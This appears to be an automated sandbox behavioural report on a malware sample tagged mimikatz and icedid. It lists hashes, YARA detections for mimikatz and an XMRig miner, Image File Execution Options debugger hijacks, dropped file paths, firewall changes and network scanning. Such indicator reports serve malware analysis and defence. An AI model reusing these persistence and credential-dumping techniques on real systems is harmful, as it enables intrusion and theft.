Analysis
-
max time kernel
150s -
max time network
150s -
platform
windows10-2004_x64 -
resource
win10v2004-20240802-en -
resource tags
arch:x64arch:x86image:win10v2004-20240802-enlocale:en-usos:windows10-2004-x64system -
submitted
02-09-2024 12:23
Behavioral task
behavioral1
Sample
2024-09-02_05c157a5d73589a64ccb83a1f5f5549d_hacktools_icedid_mimikatz.exe
Resource
win7-20240729-en
Behavioral task
behavioral2
Sample
2024-09-02_05c157a5d73589a64ccb83a1f5f5549d_hacktools_icedid_mimikatz.exe
Resource
win10v2004-20240802-en
General
-
Target
2024-09-02_05c157a5d73589a64ccb83a1f5f5549d_hacktools_icedid_mimikatz.exe
-
Size
8.7MB
-
MD5
05c157a5d73589a64ccb83a1f5f5549d
-
SHA1
3a8b7cb028ac9280eaaf7dbbf49c8b483e271650
-
SHA256
d2084467280bd87f4361748ad248ef0184acdbc8b008a3e040f7a453963dbdc6
-
SHA512
c1cc6eb30f56b813b488c4b4af1cffa6791fdf50a03ed1dc51834ef18850dfa317cfb2569efdcb0f58ed6df5bd7d731086a8e388e642603112c282371a68cbc1
-
SSDEEP
196608:MxygkmknGzwHdOgEPHd9BRX/nivPlTXTYo:Y5jz0E51/iv1
Malware Config
Signatures
-
Mimikatz
mimikatz is an open source tool to dump credentials on Windows.
-
Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs
description pid Process procid_target PID 4824 created 2108 4824 aginbln.exe 38 -
Contacts a large (19200) amount of remote hosts 1 TTPs
This may indicate a network scan to discover remotely running services.
-
Creates a large amount of network flows 1 TTPs
This may indicate a network scan to discover remotely running services.
-
OS Credential Dumping: LSASS Memory 1 TTPs
Malicious access to Credentials History.
-
XMRig Miner payload 10 IoCs
resource yara_rule behavioral2/memory/3872-182-0x00007FF77DC70000-0x00007FF77DD90000-memory.dmp xmrig behavioral2/memory/3872-186-0x00007FF77DC70000-0x00007FF77DD90000-memory.dmp xmrig behavioral2/memory/3872-203-0x00007FF77DC70000-0x00007FF77DD90000-memory.dmp xmrig behavioral2/memory/3872-216-0x00007FF77DC70000-0x00007FF77DD90000-memory.dmp xmrig behavioral2/memory/3872-225-0x00007FF77DC70000-0x00007FF77DD90000-memory.dmp xmrig behavioral2/memory/3872-234-0x00007FF77DC70000-0x00007FF77DD90000-memory.dmp xmrig behavioral2/memory/3872-250-0x00007FF77DC70000-0x00007FF77DD90000-memory.dmp xmrig behavioral2/memory/3872-266-0x00007FF77DC70000-0x00007FF77DD90000-memory.dmp xmrig behavioral2/memory/3872-267-0x00007FF77DC70000-0x00007FF77DD90000-memory.dmp xmrig behavioral2/memory/3872-269-0x00007FF77DC70000-0x00007FF77DD90000-memory.dmp xmrig -
mimikatz is an open source tool to dump credentials on Windows 5 IoCs
resource yara_rule behavioral2/memory/4556-0-0x0000000000400000-0x0000000000A9B000-memory.dmp mimikatz behavioral2/memory/4556-4-0x0000000000400000-0x0000000000A9B000-memory.dmp mimikatz behavioral2/files/0x0008000000023473-6.dat mimikatz behavioral2/memory/2932-8-0x0000000000400000-0x0000000000A9B000-memory.dmp mimikatz behavioral2/memory/4260-138-0x00007FF7E84A0000-0x00007FF7E858E000-memory.dmp mimikatz -
Drops file in Drivers directory 3 IoCs
description ioc Process File opened for modification C:\Windows\system32\drivers\etc\hosts aginbln.exe File created C:\Windows\system32\drivers\npf.sys wpcap.exe File created C:\Windows\system32\drivers\etc\hosts aginbln.exe -
Event Triggered Execution: Image File Execution Options Injection 1 TTPs 40 IoCs
description ioc Process Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\magnify.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" aginbln.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\bitsadmin.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" aginbln.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\WmiPrvSE.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" aginbln.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\takeown.exe aginbln.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\regini.exe aginbln.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\at.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" aginbln.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\powershell.exe aginbln.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe aginbln.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\mshta.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" aginbln.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\WinSAT.exe aginbln.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\reg.exe aginbln.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\cscript.exe aginbln.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\mshta.exe aginbln.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\netsh.exe aginbln.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\rundll32.exe aginbln.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\taskkill.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" aginbln.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\wscript.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" aginbln.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\perfmon.exe aginbln.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\certutil.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" aginbln.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\bitsadmin.exe aginbln.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\netsh.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" aginbln.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\powershell.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" aginbln.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\wscript.exe aginbln.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\perfmon.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" aginbln.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\cscript.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" aginbln.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\regini.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" aginbln.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\rundll32.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" aginbln.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\takeown.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" aginbln.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\taskkill.exe aginbln.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\icacls.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" aginbln.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\at.exe aginbln.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\certutil.exe aginbln.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Regsvr32.exe aginbln.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Regsvr32.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" aginbln.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\WmiPrvSE.exe aginbln.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\WinSAT.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" aginbln.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\icacls.exe aginbln.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\reg.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" aginbln.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" aginbln.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\magnify.exe aginbln.exe -
Modifies Windows Firewall 2 TTPs 2 IoCs
pid Process 3936 netsh.exe 912 netsh.exe -
Executes dropped EXE 29 IoCs
pid Process 2932 aginbln.exe 4824 aginbln.exe 4576 wpcap.exe 2816 nhkqndyng.exe 4260 vfshost.exe 3036 fmiclltfn.exe 5068 xohudmc.exe 800 ogmqgi.exe 3872 unzsbd.exe 3104 fmiclltfn.exe 3960 aginbln.exe 2656 fmiclltfn.exe 2512 fmiclltfn.exe 4504 fmiclltfn.exe 3096 fmiclltfn.exe 2816 fmiclltfn.exe 4928 fmiclltfn.exe 448 fmiclltfn.exe 2448 fmiclltfn.exe 1852 fmiclltfn.exe 1272 fmiclltfn.exe 2896 fmiclltfn.exe 4620 fmiclltfn.exe 1612 fmiclltfn.exe 4280 fmiclltfn.exe 1800 fmiclltfn.exe 388 fmiclltfn.exe 2568 uedzbgtiz.exe 5900 aginbln.exe -
Loads dropped DLL 12 IoCs
pid Process 4576 wpcap.exe 4576 wpcap.exe 4576 wpcap.exe 4576 wpcap.exe 4576 wpcap.exe 4576 wpcap.exe 4576 wpcap.exe 4576 wpcap.exe 4576 wpcap.exe 2816 nhkqndyng.exe 2816 nhkqndyng.exe 2816 nhkqndyng.exe -
resource yara_rule behavioral2/files/0x00070000000234c6-134.dat upx behavioral2/memory/4260-136-0x00007FF7E84A0000-0x00007FF7E858E000-memory.dmp upx behavioral2/memory/4260-138-0x00007FF7E84A0000-0x00007FF7E858E000-memory.dmp upx behavioral2/memory/3036-142-0x00007FF6A6950000-0x00007FF6A69AB000-memory.dmp upx behavioral2/files/0x00070000000234d1-141.dat upx behavioral2/memory/3036-155-0x00007FF6A6950000-0x00007FF6A69AB000-memory.dmp upx behavioral2/files/0x00070000000234ce-163.dat upx behavioral2/memory/3872-165-0x00007FF77DC70000-0x00007FF77DD90000-memory.dmp upx behavioral2/memory/3104-171-0x00007FF6A6950000-0x00007FF6A69AB000-memory.dmp upx behavioral2/memory/2656-179-0x00007FF6A6950000-0x00007FF6A69AB000-memory.dmp upx behavioral2/memory/3872-182-0x00007FF77DC70000-0x00007FF77DD90000-memory.dmp upx behavioral2/memory/2512-184-0x00007FF6A6950000-0x00007FF6A69AB000-memory.dmp upx behavioral2/memory/3872-186-0x00007FF77DC70000-0x00007FF77DD90000-memory.dmp upx behavioral2/memory/4504-189-0x00007FF6A6950000-0x00007FF6A69AB000-memory.dmp upx behavioral2/memory/3096-193-0x00007FF6A6950000-0x00007FF6A69AB000-memory.dmp upx behavioral2/memory/2816-197-0x00007FF6A6950000-0x00007FF6A69AB000-memory.dmp upx behavioral2/memory/4928-201-0x00007FF6A6950000-0x00007FF6A69AB000-memory.dmp upx behavioral2/memory/3872-203-0x00007FF77DC70000-0x00007FF77DD90000-memory.dmp upx behavioral2/memory/448-206-0x00007FF6A6950000-0x00007FF6A69AB000-memory.dmp upx behavioral2/memory/2448-210-0x00007FF6A6950000-0x00007FF6A69AB000-memory.dmp upx behavioral2/memory/1852-214-0x00007FF6A6950000-0x00007FF6A69AB000-memory.dmp upx behavioral2/memory/3872-216-0x00007FF77DC70000-0x00007FF77DD90000-memory.dmp upx behavioral2/memory/1272-219-0x00007FF6A6950000-0x00007FF6A69AB000-memory.dmp upx behavioral2/memory/2896-223-0x00007FF6A6950000-0x00007FF6A69AB000-memory.dmp upx behavioral2/memory/3872-225-0x00007FF77DC70000-0x00007FF77DD90000-memory.dmp upx behavioral2/memory/4620-228-0x00007FF6A6950000-0x00007FF6A69AB000-memory.dmp upx behavioral2/memory/1612-231-0x00007FF6A6950000-0x00007FF6A69AB000-memory.dmp upx behavioral2/memory/4280-233-0x00007FF6A6950000-0x00007FF6A69AB000-memory.dmp upx behavioral2/memory/3872-234-0x00007FF77DC70000-0x00007FF77DD90000-memory.dmp upx behavioral2/memory/1800-236-0x00007FF6A6950000-0x00007FF6A69AB000-memory.dmp upx behavioral2/memory/388-238-0x00007FF6A6950000-0x00007FF6A69AB000-memory.dmp upx behavioral2/memory/3872-250-0x00007FF77DC70000-0x00007FF77DD90000-memory.dmp upx behavioral2/memory/3872-266-0x00007FF77DC70000-0x00007FF77DD90000-memory.dmp upx behavioral2/memory/3872-267-0x00007FF77DC70000-0x00007FF77DD90000-memory.dmp upx behavioral2/memory/3872-269-0x00007FF77DC70000-0x00007FF77DD90000-memory.dmp upx -
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Looks up external IP address via web service 2 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 72 ifconfig.me 71 ifconfig.me -
Creates a Windows Service
-
Drops file in System32 directory 18 IoCs
description ioc Process File created C:\Windows\SysWOW64\ogmqgi.exe xohudmc.exe File opened for modification C:\Windows\SysWOW64\ogmqgi.exe xohudmc.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\Content.IE5 aginbln.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\IE aginbln.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCookies aginbln.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\DDAB91A53CE5876D153BF0B6B3BA7DCE aginbln.exe File created C:\Windows\system32\wpcap.dll wpcap.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData aginbln.exe File created C:\Windows\SysWOW64\pthreadVC.dll wpcap.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\103621DE9CD5414CC2538780B4B75751 aginbln.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content aginbln.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft aginbln.exe File created C:\Windows\SysWOW64\Packet.dll wpcap.exe File created C:\Windows\system32\Packet.dll wpcap.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache aginbln.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\103621DE9CD5414CC2538780B4B75751 aginbln.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\DDAB91A53CE5876D153BF0B6B3BA7DCE aginbln.exe File created C:\Windows\SysWOW64\wpcap.dll wpcap.exe -
Drops file in Program Files directory 3 IoCs
description ioc Process File created C:\Program Files\WinPcap\rpcapd.exe wpcap.exe File created C:\Program Files\WinPcap\LICENSE wpcap.exe File created C:\Program Files\WinPcap\uninstall.exe wpcap.exe -
Drops file in Windows directory 60 IoCs
description ioc Process File created C:\Windows\wcbiqigng\imbbbzfne\nhkqndyng.exe aginbln.exe File created C:\Windows\wcbiqigng\UnattendGC\specials\xdvl-0.dll aginbln.exe File opened for modification C:\Windows\ihguignb\vimpcsvc.xml aginbln.exe File created C:\Windows\wcbiqigng\UnattendGC\svschost.xml aginbln.exe File created C:\Windows\wcbiqigng\UnattendGC\AppCapture64.dll aginbln.exe File created C:\Windows\ime\aginbln.exe aginbln.exe File created C:\Windows\wcbiqigng\imbbbzfne\ip.txt aginbln.exe File created C:\Windows\wcbiqigng\UnattendGC\specials\libeay32.dll aginbln.exe File created C:\Windows\wcbiqigng\UnattendGC\specials\schoedcl.exe aginbln.exe File created C:\Windows\wcbiqigng\UnattendGC\specials\vimpcsvc.xml aginbln.exe File created C:\Windows\wcbiqigng\imbbbzfne\scan.bat aginbln.exe File created C:\Windows\wcbiqigng\UnattendGC\specials\exma-1.dll aginbln.exe File created C:\Windows\wcbiqigng\UnattendGC\specials\schoedcl.xml aginbln.exe File opened for modification C:\Windows\wcbiqigng\Corporate\log.txt cmd.exe File created C:\Windows\wcbiqigng\UnattendGC\specials\trch-1.dll aginbln.exe File created C:\Windows\wcbiqigng\UnattendGC\specials\docmicfg.exe aginbln.exe File opened for modification C:\Windows\ihguignb\schoedcl.xml aginbln.exe File created C:\Windows\ihguignb\spoolsrv.xml aginbln.exe File created C:\Windows\wcbiqigng\Corporate\mimilib.dll aginbln.exe File created C:\Windows\wcbiqigng\UnattendGC\specials\posh-0.dll aginbln.exe File created C:\Windows\wcbiqigng\UnattendGC\specials\zlib1.dll aginbln.exe File created C:\Windows\wcbiqigng\UnattendGC\specials\spoolsrv.xml aginbln.exe File created C:\Windows\wcbiqigng\UnattendGC\specials\spoolsrv.exe aginbln.exe File created C:\Windows\wcbiqigng\UnattendGC\AppCapture32.dll aginbln.exe File opened for modification C:\Windows\ihguignb\aginbln.exe 2024-09-02_05c157a5d73589a64ccb83a1f5f5549d_hacktools_icedid_mimikatz.exe File created C:\Windows\wcbiqigng\UnattendGC\specials\libxml2.dll aginbln.exe File created C:\Windows\wcbiqigng\UnattendGC\specials\tucl-1.dll aginbln.exe File created C:\Windows\wcbiqigng\UnattendGC\specials\ucl.dll aginbln.exe File created C:\Windows\wcbiqigng\UnattendGC\specials\svschost.exe aginbln.exe File created C:\Windows\wcbiqigng\UnattendGC\vimpcsvc.xml aginbln.exe File created C:\Windows\wcbiqigng\UnattendGC\specials\cnli-1.dll aginbln.exe File created C:\Windows\wcbiqigng\UnattendGC\docmicfg.xml aginbln.exe File created C:\Windows\ihguignb\schoedcl.xml aginbln.exe File created C:\Windows\ihguignb\docmicfg.xml aginbln.exe File opened for modification C:\Windows\ihguignb\spoolsrv.xml aginbln.exe File created C:\Windows\wcbiqigng\UnattendGC\Shellcode.ini aginbln.exe File created C:\Windows\wcbiqigng\imbbbzfne\uedzbgtiz.exe aginbln.exe File created C:\Windows\wcbiqigng\UnattendGC\spoolsrv.xml aginbln.exe File created C:\Windows\ihguignb\vimpcsvc.xml aginbln.exe File created C:\Windows\wcbiqigng\imbbbzfne\wpcap.dll aginbln.exe File created C:\Windows\wcbiqigng\Corporate\vfshost.exe aginbln.exe File created C:\Windows\ihguignb\svschost.xml aginbln.exe File created C:\Windows\wcbiqigng\upbdrjv\swrpwe.exe aginbln.exe File created C:\Windows\wcbiqigng\imbbbzfne\Packet.dll aginbln.exe File created C:\Windows\wcbiqigng\UnattendGC\specials\trfo-2.dll aginbln.exe File created C:\Windows\wcbiqigng\UnattendGC\schoedcl.xml aginbln.exe File opened for modification C:\Windows\ihguignb\docmicfg.xml aginbln.exe File created C:\Windows\wcbiqigng\Corporate\mimidrv.sys aginbln.exe File opened for modification C:\Windows\wcbiqigng\imbbbzfne\Result.txt uedzbgtiz.exe File created C:\Windows\wcbiqigng\imbbbzfne\wpcap.exe aginbln.exe File created C:\Windows\wcbiqigng\UnattendGC\specials\tibe-2.dll aginbln.exe File created C:\Windows\wcbiqigng\UnattendGC\specials\vimpcsvc.exe aginbln.exe File created C:\Windows\wcbiqigng\UnattendGC\specials\coli-0.dll aginbln.exe File created C:\Windows\wcbiqigng\UnattendGC\specials\docmicfg.xml aginbln.exe File opened for modification C:\Windows\ihguignb\svschost.xml aginbln.exe File created C:\Windows\ihguignb\aginbln.exe 2024-09-02_05c157a5d73589a64ccb83a1f5f5549d_hacktools_icedid_mimikatz.exe File created C:\Windows\wcbiqigng\UnattendGC\specials\ssleay32.dll aginbln.exe File opened for modification C:\Windows\wcbiqigng\imbbbzfne\Packet.dll aginbln.exe File created C:\Windows\wcbiqigng\UnattendGC\specials\crli-0.dll aginbln.exe File created C:\Windows\wcbiqigng\UnattendGC\specials\svschost.xml aginbln.exe -
Launches sc.exe 4 IoCs
Sc.exe is a Windows utlilty to control services on the system.
pid Process 2748 sc.exe 5060 sc.exe 872 sc.exe 3492 sc.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Event Triggered Execution: Netsh Helper DLL 1 TTPs 51 IoCs
Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.
description ioc Process Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe -
System Location Discovery: System Language Discovery 1 TTPs 64 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language PING.EXE Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language wpcap.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cacls.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language sc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language xohudmc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cacls.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened 